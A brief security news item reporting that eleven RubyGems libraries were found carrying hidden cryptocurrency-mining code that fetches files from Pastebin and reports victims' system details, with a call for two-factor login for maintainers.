On the RubyGems platform, in 11 open source libraries that have more than 3,500 downloads, hidden code for crypto jacking has been discovered.
It is reported that hackers download libraries written in the Ruby programming language, inject malicious code, and then download them to RubyGems with new names. For example, the doge_coin, coin_base, and blockchain_wallet libraries associated with cryptocurrencies have been downloaded over a thousand times.
After the user installs such a library, it downloads additional files from the Pastebin website and launches hidden cryptocurrency mining. The malicious library also sends the hacker the IP address of the infected computer and various system parameters, which may contain personal information of the user.
RubyGems users believe that developers of popular libraries need to enable two-factor authorization when they log in to the site, since thousands of computers and users may suffer if their account is hacked and their libraries are replaced.
Recall that the recently specialized cybersecurity company Varonis announced the discovery of a new Norman virus miner, which hides its presence from the task list.